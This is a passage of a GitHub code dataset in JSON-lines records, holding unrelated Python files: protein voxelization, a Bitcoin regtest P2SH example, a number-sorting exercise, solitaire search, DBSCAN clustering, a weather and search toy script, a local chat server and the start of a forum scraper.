-1)*self.randomize_by\n \n self.xyz_beta_data = self.xyz_beta_data + beta_rand\n self.xyz_alpha_data = self.xyz_alpha_data + alpha_rand\n \n \n self.static_data = static_data \n # Send translational details to next routine \n self.change_coordinates_for_voxel_dimension(self.xyz_beta_data)#, translate_data)\n self.calculate_unit_vectors()\n self.voxelize()\n return self.voxel_layers, self.voxel_mask\n \n \n def change_coordinates_for_voxel_dimension(self, xyz_coords):\n n = self.voxel_size_A \n \n xyz_vox = np.round( xyz_coords/n)\n min_ = np.min(xyz_vox, 0)\n xyz_vox = (xyz_vox - min_).astype(int) # normalizing \n \n max_vals = np.max( [ np.max(xyz_vox, 0) - self.cube_size +1 ,\n [0,0,0]],0) +1 + int(self.crop_extra_edge)\n \n \n away_from_center = (np.max([self.cube_size-np.max(xyz_vox,0),[0,0,0]],0)/2).astype(int)-1# finds movable pixels\n \n away_from_center = np.max([away_from_center,np.ones(3)*self.crop_extra_edge/2],0)\n \n # print(away_from_center)\n counter_ijk =np.zeros(3)\n counter = 0\n while 1: # to solve emply voxel problems\n if counter <=50:\n cube_start_points = np.zeros(3)+self.cube_start_points + counter_ijk \n if self.cube_start_points == -1:\n cube_start_points = np.random.randint(max_vals) \n \n \n \n translate_amount = np.zeros(3)\n if self.max_pixel_translate_per_axis != 0:\n translate_amount = (np.min(\n [ np.random.randint((self.max_pixel_translate_per_axis,)*3), \n away_from_center],0) * \n ((np.random.randint((2,)*3) -0.5)/0.5)).astype(int)\n \n \n \n translate_from_center = (translate_amount-away_from_center).astype(int) \n \n \n # print(translate_amount,away_from_center,translate_amount-away_from_center)\n # print(max_vals)\n # print(cube_start_points)\n \n # print(cube_start_points,max_vals)\n xyz_use_index1 = xyz_vox >= cube_start_points\n xyz_use_index2 = xyz_vox < (cube_start_points + self.cube_size - self.crop_extra_edge)\n \n indexes = xyz_use_index1 & xyz_use_index2\n indexes = np.sum(indexes,1)==3\n #print(counter_ijk, max_vals, counter ,sum(indexes), len(indexes))\n if sum(indexes) > 5: # minimum coordinates should be 5\n break\n \n for pit in range(3):\n if counter_ijk[pit] <= counter:\n counter_ijk[pit] += 1 \n if sum(counter_ijk == counter_ijk[0])== 3:\n counter +=1\n \n break\n \n if counter > 50: #HARD measure \n #print (\"index trap!\") \n counter_ijk =np.zeros(3)\n cube_start_points = np.random.randint(max_vals) \n \n \n xyz_vox = xyz_vox[indexes,:]\n \n # if ( (xyz_vox[:,0].size == 0) or (xyz_vox[:,1].size == 0) or (xyz_vox[:,1].size == 0)):\n # \n #print(xyz_vox.shape)\n try:\n xyz_vox[:,0] -= min(xyz_vox[:,0]) + translate_from_center[0]\n xyz_vox[:,1] -= min(xyz_vox[:,1]) + translate_from_center[1]\n xyz_vox[:,2] -= min(xyz_vox[:,2]) + translate_from_center[2]\n except:\n \n print(\"hey\" ,xyz_vox.shape)\n return 0\n \n \n self.xyz_vox = xyz_vox \n self.indexes = indexes\n \n def rotation_mat(self,theta,axis):\n pi=np.pi\n theta=theta*pi/180\n a = np.cos(theta/2)\n b,c,d = -axis*np.sin(theta/2)\n rot_mat=np.array([[a*a+b*b-c*c-d*d, 2*(b*c-a*d), 2*(b*d+a*c)],\n [2*(b*c+a*d), a*a+c*c-b*b-d*d, 2*(c*d-a*b)],\n [2*(b*d-a*c), 2*(c*d+a*b), a*a+d*d-b*b-c*c]]) \n \n return (rot_mat)#+origin) \n\n \n def rotate_coordinates_by(self,alfa):\n \n alfa = ((np.random.rand(1)*2)-1)*alfa\n if not alfa == 0:\n rotation_xyz = self.xyz_data\n origin = np.mean(self.xyz_data,0) # center of coordinates\n axist= rotation_xyz[np.random.randint(len(self.xyz_data))] - origin # random axis from CB\n \n axist = axist/np.sqrt(np.dot(axist,axist))\n rot_m = np.squeeze(self.rotation_mat(alfa,axist))\n t_data = rotation_xyz-origin\n \n for j in range (self.xyz_data.shape[0]):\n c_data=t_data[j]\n t_data[j]=np.dot(rot_m,c_data) \n \n self.xyz_data = t_data +origin\n \n # Center yaa translate rotate \n \n def calculate_unit_vectors(self): \n ## Calculating unit vector for required data only\n unit_v = self.xyz_alpha_data[self.indexes,:] - self.xyz_beta_data[self.indexes,:]\n # for i in unit_v:\n # print (i)\n \n self.use_CA_for_indexes = self.xyz_alpha_data[self.indexes,:]\n self.use_CB_for_indexes = self.xyz_beta_data[self.indexes,:]\n \n dist_v = np.sqrt(np.sum( unit_v**2,1))\n for i in range(len(unit_v)):\n if sum(unit_v[i]==0) == 3 :\n continue\n unit_v[i] = unit_v[i] / dist_v[i]\n \n self.unit_v = unit_v\n \n def voxelize(self):\n self.usable_static_data = np.array(self.static_data[1])[self.indexes]\n self.voxel_mask = []\n self.voxel_layers = []\n \n \n ca_cb_layers = 6\n if self.layers_use == 29:\n ca_cb_layers =3\n \n res_ind_layer = 0\n if self.use_res_index == 1:\n res_ind_layer = 2 # one for res number, one for chain\n \n \n property_layers = 5 # +1 for debuguibg case\n total_layers = (1+ #Voxel \n property_layers+ #PROPERTIES\n 20+ #ONE-HOT-AA\n ca_cb_layers + #for CA vector\n res_ind_layer)\n # 1+ # AA number for only recovery\n # 1 # interaction # not used in training etc. \n # )\n \n \n layers = np.zeros((total_layers,)+(self.cube_size,)*3)\n mask = np.zeros((1,)+(self.cube_size,)*3)\n \n if self.return_res_numbers_from_1 == 1:\n res_mat_from_1 = np.zeros((1,)+(self.cube_size,)*3)\n # print(layers.shape, layers[0].shape,)\n # print(\"here\",np.max(self.xyz_vox,0),\"done\")\n \n \n \n for counter, (i, j, k) in enumerate(self.xyz_vox): \n static_data_for_res = self.usable_static_data[counter]\n # print(i,j,k)\n aa_param_hydropathy = static_data_for_res[2]\n aa_param_aromaticity = static_data_for_res[3]\n aa_param_hbond_doner = static_data_for_res[4]\n aa_param_hbond_accept = static_data_for_res[5]\n \n aa_sasa = static_data_for_res[6] # index start from 1\n # if ((i>34) or (i>34) or (i>34)):\n # print(i,j,k)\n \n layers[0,i,j,k] = 1 # Voxel Layer\n layers[1,i,j,k] = aa_param_hydropathy # hydrophobic_layer\n layers[2,i,j,k] = aa_param_aromaticity # aromatic_layer\n layers[3,i,j,k] = aa_param_hbond_doner\n layers[4,i,j,k] = aa_param_hbond_accept \n layers[5,i,j,k] = aa_sasa # SASA\n #layers[4,i,j,k] = counter # for debugging\n \n # One hot layers for amino-acids\n #print(aa_type)\n aa_number = int(static_data_for_res[1] -1)\n \n aa_index = 1 + property_layers + aa_number # after property layers\n layers[aa_index,i,j,k] = 1\n\n # CA unit vectors 26 27 28 X Y Z\n \n # layers[26,i,j,k] = self.unit_v[counter][0]*self.use_CA_vetor\n # layers[27,i,j,k] = self.unit_v[counter][1]*self.use_CA_vetor\n # layers[28,i,j,k] = self.unit_v[counter][2]*self.use_CA_vetor\n \n #Trying CB and CA coordinate3s\n if self.layers_use == 32:\n layers[26,i,j,k] = self.use_CA_for_indexes[counter][0]\n layers[27,i,j,k] = self.use_CA_for_indexes[counter][1]\n layers[28,i,j,k] = self.use_CA_for_indexes[counter][2]\n \n layers[29,i,j,k] = self.use_CB_for_indexes[counter][0]\n layers[30,i,j,k] = self.use_CB_for_indexes[counter][1]\n layers[31,i,j,k] = self.use_CB_for_indexes[counter][2]\n \n elif self.layers_use == 29:\n if self.layer_29_type == 0:\n layers[26,i,j,k] = self.use_CA_for_indexes[counter][0]\n layers[27,i,j,k] = self.use_CA_for_indexes[counter][1]\n layers[28,i,j,k] = self.use_CA_for_indexes[counter][2]\n elif self.layer_29_type == 1:\n layers[26,i,j,k] = self.use_CB_for_indexes[counter][0]\n layers[27,i,j,k] = self.use_CB_for_indexes[counter][1]\n layers[28,i,j,k] = self.use_CB_for_indexes[counter][2]\n else:\n layers[26,i,j,k] = self.unit_v[counter][0]*self.use_CA_vetor\n layers[27,i,j,k] = self.unit_v[counter][1]*self.use_CA_vetor\n layers[28,i,j,k] = self.unit_v[counter][2]*self.use_CA_vetor\n \n \n\n\n ## just checking^^^^\n \n if self.use_res_index ==1:\n # amino acid number for connnectivity recovery starts from 1\n # do not use for training\n layers[-2,i,j,k] = static_data_for_res[7]\n layers[-1,i,j,k] = static_data_for_res[8]\n # interaction layer \n #print(self.all_interacting_aa_from_all_atoms)\n # interaction_voxel = self.only_protein_residues[counter+1] \n # print(mask.shape)\n mask[0,i,j,k] = static_data_for_res[-1]\n \n if self.return_res_numbers_from_1 == 1:\n res_mat_from_1[0,i,j,k] = static_data_for_res[0]\n \n self.voxel_mask = mask\n self.voxel_layers = layers\n if self.return_res_numbers_from_1 == 1:\n self.res_mat_from_1 = res_mat_from_1\n # def coordinates_for_ground_truth_and_predicted(self):\n # xyz_cb_true = []\n \n \ndef is_model_params_correct():\n if not os.path.exists(config1.model_root_directory):\n print(\"Please set the correct model_root_directory in settings.py\")\n return 0\n return 1\n \n\n\n \nif __name__ == \"__main__\": \n from data_preparation.pdb_2_interaction_file_converter import pdb_to_interaction_file\n dir_ = \"/home/sudhanshu/HDD3/Data/Sudhanshu/pdb_chains/dataset/pdbs/bad/pdb_npz/\"\n for i in range(1):\n \n print(i)\n \n pdb_file = '/home/sudhanshu/HDD3/Data/Sudhanshu/pdb_chains/dataset/pdbs/bad/1M1J_3_000.pdb'\n \n #s,x=load_pdb_npz_to_static_data_and_coordinates(dir_ + '1M1J_3_000_data.pdb.npz')\n f = pdb_to_interaction_file(pdb_file, './',0, verbose=0)\n f.carb_aa_distance_calc_and_save = 1 \n f.save_data =0\n s,x = f.run_me() \n \n \n for i in range(len(s[1])):\n s[1][i][-1]= 0\n \n \n xyz_vx = xyz_to_rotate_to_voxelize_to_translate()\n xyz_vx.max_pixel_translate_per_axis=0\n xyz_vx.max_rotation_plus_minus = 0\n xyz_vx.cube_start_points = 0\n xyz_vx.use_res_index =0\n f,u=xyz_vx.apply(x,s)\n \n \n # xyz_vx.pdb_f.read_pdb('/home/sudhanshu/HDD3/Data/Sudhanshu/pdb_chains/dataset/random_rotated/pdbs/test/CB_test.pdb')\n # xyz_vx.pdb_f.dump_pdb('./temp_files/m0.pdb')\n # xyz_vx.pdb_f.xyz_data =xyz_vx.xyz_beta_data\n # xyz_vx.pdb_f.refresh_from_xyz()\n # xyz_vx.pdb_f.dump_pdb('./temp_files/m1.pdb')\n # np.savez( './temp_files/xx.npz',\n # layers = f)\n \n # np.savez('./temp_files/xx_mask.npz',\n # interaction= u\n # )\n# print(np.max(f,0)-np.min(f,0))\n\n# fig = plt.figure()\n# ax = fig.add_subplot(projection='3d')\n\n# plt.scatter(f[:,0],f[:,1],f[:,2])\n\n","repo_name":"Graylab/CAPSIF","sub_path":"capsif_v/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19354,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41114098466","text":"#!/usr/bin/env python3\n\n\"\"\"\nExample of a Pay-to-Script-Hash (P2SH) transaction.\n\nP2SH is next in the evolution of Bitcoin transactions. Instead of \nlocking the transaction to the hash of a public key, we lock it to \nthe hash of a Bitcoin Script program. This moves the storage of the \nscript program itself to the transaction input.\n\n\"\"\"\n\nimport os, sys\n\nsys.path.append(os.path.dirname(__file__).split('/transactions')[0])\n\nfrom lib.encoder import encode_tx, encode_script\nfrom lib.helper import encode_address, decode_address, hash_script\nfrom lib.hash import hash160, hash256\nfrom lib.sign import sign_tx\nfrom lib.rpc import RpcSocket\n\n## Setup our RPC socket.\nrpc = RpcSocket({ 'wallet': 'regtest' })\nassert rpc.check()\n\n## Get a utxo for Alice.\nalice_utxo = rpc.get_utxo(0)\nfund_value = alice_utxo['value'] - 1000\n\n## Get a payment address for Bob.\nbob_funding_txout = rpc.get_recv(fmt='base58')\nbob_funding_hash = decode_address(bob_funding_txout['address'])\nbob_spending_txout = rpc.get_recv(fmt='base58')\nbob_spending_hash = decode_address(bob_spending_txout['address'])\n\n## Convert the secret to bytes, then hash using hash160 function.\nsecret_message = 'superisatestnet'\nsecret_bytes = secret_message.encode('utf8').hex()\nsecret_hash = hash160(secret_bytes).hex()\n\n## Here is the script we will be using.\nlock_script_words = [\n 'OP_HASH160', secret_hash, 'OP_EQUALVERIFY', \n 'OP_DUP', 'OP_HASH160', bob_funding_hash, 'OP_EQUALVERIFY',\n 'OP_CHECKSIG'\n]\n\n## This is the hex-encoded data that we will present to unlock the output.\nlock_script_code = encode_script(lock_script_words, prepend_len=False).hex()\n\n## This is the hash of the script. The output will be locked to this script hash.\nlocking_script_hash = hash_script(lock_script_words)\n\nfunding_tx = {\n 'version': 1,\n 'vin': [{\n 'txid': alice_utxo['txid'],\n 'vout': alice_utxo['vout'],\n 'script_sig': [],\n 'sequence': 0xFFFFFFFF\n }],\n 'vout': [{\n 'value': fund_value,\n 'script_pubkey': ['OP_HASH160', locking_script_hash, 'OP_EQUAL']\n }],\n 'locktime': 0\n}\n\n## Since we have the complete transaction, we can calculate the transaction ID.\nfunding_txid = hash256(bytes.fromhex(encode_tx(funding_tx)))[::-1].hex()\n\n## The redeem script is a basic Pay-to-Pubkey-Hash template.\nutxo_redeem_script = f\"76a914{alice_utxo['pubkey_hash']}88ac\"\n\n## We are signing Alice's UTXO using BIP143 standard.\nalice_signature = sign_tx(\n funding_tx, # The transaction.\n 0, # The input being signed.\n alice_utxo['value'], # The value of the utxo being spent.\n utxo_redeem_script, # The redeem script to unlock the utxo. \n alice_utxo['priv_key'] # The private key to the utxo pubkey hash.\n)\n\n## Include the arguments needed to unlock the redeem script.\nfunding_tx['vin'][0]['witness'] = [ alice_signature, alice_utxo['pub_key'] ]\n\nspending_tx = {\n 'version': 1,\n 'vin': [{\n 'txid': funding_txid,\n 'vout': 0,\n 'script_sig': [],\n 'sequence': 0xFFFFFFFF\n }],\n 'vout': [{\n 'value': fund_value - 1000,\n 'script_pubkey': ['OP_DUP', 'OP_HASH160', bob_spending_hash, 'OP_EQUALVERIFY', 'OP_CHECKSIG']\n }],\n 'locktime': 0\n}\n\n## Since we have the complete transaction, we can calculate the transaction ID.\nspending_txid = hash256(bytes.fromhex(encode_tx(spending_tx)))[::-1].hex()\n\n## Bob is signging to release the funds.\nbob_signature = sign_tx(\n spending_tx, # The transaction.\n 0, # The input being signed.\n fund_value, # The value of the utxo being spent.\n lock_script_code, # The redeem script to unlock the utxo. \n bob_funding_txout['priv_key'] # The private key to the utxo pubkey hash.\n)\n\nspending_tx['vin'][0]['script_sig'] = [ \n bob_signature, bob_funding_txout['pub_key'], secret_bytes, lock_script_code \n]\n\nprint(f'''\n## Pay-to-Script-Hash Example ##\n\n-- Funding Transaction Id --\n{funding_txid}\n\n-- Alice UTXO --\n Txid : {alice_utxo['txid']}\n Vout : {alice_utxo['vout']}\n Value : {alice_utxo['value']}\n Hash : {alice_utxo['pubkey_hash']}\n\n-- Funding Address --\n Address : {encode_address(locking_script_hash)}\n Coins : {fund_value}\n\n-- Funding Tx Hex --\n{encode_tx(funding_tx)}\n\n-- Redeem Transaction Id --\n{funding_txid}\n\n-- Redeem Tx Hex --\n{encode_tx(spending_tx)}\n\n''')\n","repo_name":"cmdruid/bitcoin-programming","sub_path":"contrib/python/transactions/wip/p2sh.py","file_name":"p2sh.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"13142493972","text":"#5. Faça um Programa que leia 20 números inteiros e armazene-os num vetor. Armazene os números pares no vetor PAR e os números IMPARES no vetor ímpar. Imprima os três vetores.\n\n\nimport array as arr\n\nvetor = arr.array('i', [])\nvPar = arr.array('i', [])\nvImpar = arr.array('i', [])\ncontador = 0\n\nwhile contador <=19:\n num = int(input('Digite um número: '))\n vetor.append(num)\n if num%2==0:\n vPar.append(num)\n else:\n vImpar.append(num)\n contador += 1\n\n\n# print(\"\\n O primeiro vetor formado foi:\")\n\nprint('vetor',vetor)\nprint('par', vPar)\nprint('impar',vImpar)\n\n","repo_name":"AnaCandida/NlTalentosPython","sub_path":"aula2AnaQuadros/exc5.py","file_name":"exc5.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27109743313","text":"\"\"\"Marble solitaire forward search.\n\nUsage:\n search_forward BOARD_NAME\n\"\"\"\nimport time\nimport pickle\nfrom pathlib import Path\n\nfrom docopt import docopt\n\nfrom search import initialize_for_board, children, unique_boards, int_to_board\nfrom board_io import print_board\n\n\ndef forward_search(board_name):\n\n def save_bit_boards(index, bit_boards):\n with Path(filename_format.format(board_name, index)).open('wb') as file_out:\n pickle.dump(bit_boards, file_out)\n\n filename_format = '{}-board-{:03d}.pkl'\n starting_position = initialize_for_board(board_name)\n boards_at_move = [{starting_position}]\n save_bit_boards(0, boards_at_move[0])\n while True:\n\n filename = Path(filename_format.format(board_name, len(boards_at_move)))\n if filename.exists():\n with filename.open('rb') as file_in:\n boards_at_move.append(pickle.load(file_in))\n print(f'Moves {len(boards_at_move) - 1:4}, loaded {len(boards_at_move[-1]):10} unique boards')\n continue\n\n t_start = time.process_time()\n next_board_ids = children(boards_at_move[-1])\n board_count = len(next_board_ids)\n t_search = time.process_time()\n\n if not next_board_ids: # we are done\n break\n\n boards_at_move.append(unique_boards(next_board_ids))\n t_dedupe = time.process_time()\n\n save_bit_boards(len(boards_at_move) - 1, boards_at_move[-1])\n t_save = time.process_time()\n\n t_search, t_dedupe, t_save = t_search - t_start, t_dedupe - t_search, t_save - t_dedupe\n print(f'Moves {len(boards_at_move) - 1:4}, boards {board_count:10} ({len(boards_at_move[-1]):10} unique) '\n f'search/dedupe/save: {t_search:6.2f} / {t_dedupe:6.2f} / {t_save:6.2f} seconds')\n\n print('Saving boards...')\n t_start = time.process_time()\n filename = f'{board_name}-boards.pkl'\n with Path(filename).open('wb') as file_out:\n pickle.dump(boards_at_move, file_out)\n print(f'Saved {filename} in {time.process_time() - t_start:.3f} seconds')\n\n for index in range(len(boards_at_move)):\n Path(filename_format.format(board_name, index)).unlink()\n\n print(f'{len(boards_at_move[-1])} final unique boards for {board_name} board')\n for index, board in enumerate(boards_at_move[-1]):\n print(f'#{index} [{board}]')\n print_board(int_to_board(board))\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version='Board explorer v1.0')\n forward_search(args['BOARD_NAME'])\n","repo_name":"r1cc4rdo/marble_solitaire","sub_path":"search_forward.py","file_name":"search_forward.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22626247677","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 20 20:35:36 2023\r\n\r\n@author: Madeline\r\n\"\"\"\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport matplotlib . pyplot as plt\r\nfrom scipy . io import arff\r\nfrom sklearn.cluster import DBSCAN\r\nfrom sklearn import metrics\r\nfrom sklearn.neighbors import NearestNeighbors\r\n\r\n\r\npath = './artificial/'\r\ndatabrut = arff . loadarff ( open ( path + \"chainlink.arff\" , 'r') )\r\ndatanp = [ [ x[0] ,x[1]] for x in databrut [0] ]\r\n# Affichage en 2D\r\n# Extraire chaque valeur de features pour en faire une liste\r\n# Ex pour f0 = [ - 0 . 499261 , -1 . 51369 , -1 . 60321 , ...]\r\n# Ex pour f1 = [ - 0 . 0612356 , 0 . 265446 , 0 . 362039 , ...]\r\ndatanp = np.asarray(datanp)\r\nf0 = datanp [:,0] # tous les elements de la premiere colonne\r\nf1 = datanp [:,1] # tous les elements de la deuxieme colonne\r\nplt.scatter( f0, f1, s = 8 )\r\nplt.title(\"Donnees initiales \")\r\nplt.show()\r\n\r\n\r\n#Distances k plus proches voisins\r\n# Donnees dans X\r\nk = 5\r\nneigh = NearestNeighbors(n_neighbors = k)\r\nneigh.fit(datanp)\r\ndistances , indices = neigh.kneighbors(datanp)\r\n# retirer le point \" origine \"\r\nnewDistances = np.asarray ( [ np.average ( distances [ i ] [ 1 : ] ) for i in range (0, distances.shape[0])] )\r\ntrie = np.sort(newDistances)\r\nplt.title(\" Plus proches voisins ( 5 ) \")\r\nplt.plot(trie) ;\r\nplt.show()\r\n\r\n\r\nsilhouette_min = []\r\ndavies_bouldin_score_min = []\r\nnb_clusters_min = []\r\nX_min = np.arange(5, 15, 1)\r\n\r\nsilhouette_eps = []\r\ndavies_bouldin_score_eps = []\r\nnb_clusters_eps = []\r\nX_eps = np.arange(0.1, 1, 0.1)\r\n\r\n#Variation de eps\r\nfor d in X_eps:\r\n\r\n clustering = DBSCAN(eps=d, min_samples=5).fit(datanp)\r\n labels = clustering.labels_\r\n\r\n # Number of clusters in labels, ignoring noise if present.\r\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\r\n n_noise_ = list(labels).count(-1)\r\n \r\n nb_clusters_eps.append(n_clusters_)\r\n silhouette_eps.append(metrics.silhouette_score(datanp, labels))\r\n davies_bouldin_score_eps.append(metrics.davies_bouldin_score(datanp, labels))\r\n\r\n#Variations de min_sample\r\nfor d in X_min:\r\n\r\n clustering = DBSCAN(eps=0.09, min_samples=d).fit(datanp)\r\n labels = clustering.labels_\r\n\r\n # Number of clusters in labels, ignoring noise if present.\r\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\r\n n_noise_ = list(labels).count(-1)\r\n \r\n nb_clusters_min.append(n_clusters_)\r\n silhouette_min.append(metrics.silhouette_score(datanp, labels))\r\n davies_bouldin_score_min.append(metrics.davies_bouldin_score(datanp, labels))\r\n \r\n \r\n print(\"Estimated number of clusters: %d\" % n_clusters_)\r\n print(\"Estimated number of noise points: %d\" % n_noise_)\r\n \r\n unique_labels = set(labels)\r\n core_samples_mask = np.zeros_like(labels, dtype=bool)\r\n core_samples_mask[clustering.core_sample_indices_] = True\r\n \r\n colors = [plt.cm.Spectral(each) for each in np.linspace(0, 1, len(unique_labels))]\r\n for k, col in zip(unique_labels, colors):\r\n if k == -1:\r\n # Black used for noise.\r\n col = [0, 0, 0, 1]\r\n \r\n class_member_mask = labels == k\r\n \r\n xy = datanp[class_member_mask & core_samples_mask]\r\n plt.plot(\r\n xy[:, 0],\r\n xy[:, 1],\r\n \"o\",\r\n markerfacecolor=tuple(col),\r\n markeredgecolor=\"k\",\r\n markersize=14,\r\n )\r\n \r\n xy = datanp[class_member_mask & ~core_samples_mask]\r\n plt.plot(\r\n xy[:, 0],\r\n xy[:, 1],\r\n \"o\",\r\n markerfacecolor=tuple(col),\r\n markeredgecolor=\"k\",\r\n markersize=6,\r\n )\r\n \r\n plt.title(f\"Estimated number of clusters: {n_clusters_}\")\r\n plt.show()\r\n\r\n\r\n\r\nplt.bar(X_min, nb_clusters_min, width = 0.75)\r\nplt.grid()\r\nplt.xlabel('valeur de min_sample')\r\nplt.ylabel('Nb de clusters')\r\nplt.title ( \"Nb de clusters en fonction de min_sample\" )\r\nplt.show ()\r\n\r\nplt.bar(X_min, silhouette_min, width = 0.75)\r\nplt.grid()\r\nplt.xlabel('valeur de min_sample')\r\nplt.ylabel('coef de Silhouette')\r\nplt.title ( \"Comparaison du coefficient de silhouette pour différentes valeurs de min_sample\" )\r\nplt.show ()\r\n\r\nplt.bar(X_min, davies_bouldin_score_min, width = 0.75)\r\nplt.grid()\r\nplt.xlabel('valeur de min_sample')\r\nplt.ylabel('Indice de Davies Bouldin')\r\nplt.title ( \"Comparaison de l'indice de Davies Bouldin pour différentes valeurs de min_sample \" )\r\nplt.show ()\r\n\r\n\r\nplt.bar(X_eps, nb_clusters_eps, width = 0.075)\r\nplt.grid()\r\nplt.xlabel('valeur de eps')\r\nplt.ylabel('Nb de clusters')\r\nplt.title ( \"Nb de clusters en fonction de eps\" )\r\nplt.show ()\r\n\r\nplt.bar(X_eps, silhouette_eps, width = 0.075)\r\nplt.grid()\r\nplt.xlabel('valeur de eps')\r\nplt.ylabel('coef de Silhouette')\r\nplt.title ( \"Comparaison du coefficient de silhouette pour différentes valeurs de eps\" )\r\nplt.show ()\r\n\r\nplt.bar(X_eps, davies_bouldin_score_eps, width = 0.075)\r\nplt.grid()\r\nplt.xlabel('valeur de eps')\r\nplt.ylabel('Indice de Davies Bouldin')\r\nplt.title ( \"Comparaison de l'indice de Davies Bouldin pour différentes valeurs de eps \" )\r\nplt.show ()","repo_name":"Madeliine/TP_Clustering","sub_path":"dbscan.py","file_name":"dbscan.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2976542765","text":"import requests\nimport time\nfrom time import sleep\nimport os\n\nfrom tqdm import tqdm \nfrom googlesearch import search\n\nimport sys\n\ndef spinning_cursor():\n while True:\n for cursor in '|/-\\\\':\n yield cursor\n\nprint(\"I can also tell you useful things like the weather!\")\nsleep(1.0)\nweathercity = input(\"What town/city are you in? \")\nweather = requests.get('http://api.openweathermap.org/data/2.5/weather?q='+weathercity+',uk&units=metric&appid=886705b4c1182eb1c69f28eb8c520e20')\n\n\ndata = weather.json()\n\ntemp = data['main']['temp']\ndescription = data['weather'][0]['description']\ncityname = data['name']\nweatherprint =\"In {}, it is currently {}° with {}.\"\nspinner = spinning_cursor()\nfor _ in range(25):\n sys.stdout.write(next(spinner))\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\b')\nprint(weatherprint.format(cityname, temp, description))\n\nsleep(2.0)\n\n\"\"\"GOOGLE SEARCH\"\"\"\n\nprint(\"\\nI can also make Google searches!\")\nsleep(0.5)\nquery = input(\"What do you wanna search? \")\nfor _ in range(25):\n sys.stdout.write(next(spinner))\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\b')\nprint(\"Here are the top 5 results:\")\nfor i in search(query, tld=\"co.in\", num=5, stop=5):\n print(i)\n\n\nmusicreq = input(\"What song would you like to hear? Please copy the file path and paste it hear, if you need help go to:\\nhttps://url.mystik01.me/help\\nPlease paste file path here: \")\nos.startfile(musicreq)","repo_name":"Mystik01/chatbot","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71390770408","text":"# -*- coding: utf-8 -*-\n\nimport socket\nimport threading\nimport time\n\nhost = \"127.0.0.1\"\nuser_list = {}\nnotice_flag = 0\n\ndef msg_func(msg, port):\n print(msg)\n for con in user_list.values():\n if port == int(con.getsockname()[1]):\n try:\n con.send(msg.encode('utf-8'))\n except:\n print(\"연결이 비 정상적으로 종료된 소켓 발견\")\n \ndef msg_user_list(port):\n msg = \"!@#$\"\n for i in user_list.keys():\n if port == int(user_list[i].getsockname()[1]):\n msg = msg +\",\"+ i\n print(msg)\n for con in user_list.values():\n if port == int(con.getsockname()[1]):\n # msg = msg + \n try:\n con.send(msg.encode('utf-8'))\n except:\n print(\"연결이 비 정상적으로 종료된 소켓 발견\")\n \ndef handle_receive(client_socket, addr, user, port):\n msg = \"---- %s님이 들어오셨습니다. ----\"%user\n msg_func(msg, port)\n msg_user_list(port)\n while 1:\n data = client_socket.recv(1024)\n string = data.decode('utf-8')\n\n if \"/종료\" in string:\n msg = \"---- %s님이 나가셨습니다. ----\"%user\n #유저 목록에서 방금 종료한 유저의 정보를 삭제\n del user_list[user]\n msg_func(msg, port)\n msg_user_list(port)\n break\n string = \"%s : %s\"%(user, string)\n msg_func(string, port)\n client_socket.close()\n\ndef accept_func(port, num):\n #IPv4 체계, TCP 타입 소켓 객체를 생성\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #포트를 사용 중 일때 에러를 해결하기 위한 구문\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n #ip주소와 port번호를 함께 socket에 바인드 한다.\n #포트의 범위는 1-65535 사이의 숫자를 사용할 수 있다.\n server_socket.bind((host, port))\n\n #서버가 최대 5개의 클라이언트의 접속을 허용한다.\n server_socket.listen(num)\n\n while 1:\n try:\n #클라이언트 함수가 접속하면 새로운 소켓을 반환한다.\n client_socket, addr = server_socket.accept()\n except KeyboardInterrupt:\n for user, con in user_list:\n con.close()\n server_socket.close()\n print(\"Keyboard interrupt\")\n break\n user = client_socket.recv(1024).decode('utf-8')\n user_list[user] = client_socket\n \n receive_thread = threading.Thread(target=handle_receive, args=(client_socket, addr,user, port))\n receive_thread.daemon = True\n receive_thread.start()\n\ndef server_open(port, num):\n accept_func(port, num)\n","repo_name":"ggaebi99/Chat_PyQt","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22107567214","text":"import os\nimport random\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport time\n#import sys\nimport traceback\nimport threading\nimport redis\nimport re\nfrom pymongo import MongoClient\nimport socket\nimport arrow\nimport dateutil\nimport datetime\nfrom urllib.request import quote\nimport myUtils\nfrom aiohttp import ClientSession\nimport aiohttp\nimport asyncio\n#import urllib\n\nesheader={'index_name':'tieba_posts','type_name':'tieba_posts'}\n\nemoji_pattern = re.compile(\"[\"\n \"\\U0001F600-\\U0001F64F\" # emoticons\n \"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n \"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n \"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n\ndef remove_emoji(text):\n return emoji_pattern.sub(r'', text)\n\ndef deal_dayErr(m,d,tz):\n try:\n last_reply_at = arrow.get(arrow.now().format('YYYY-') + '-'.join([m,d]), 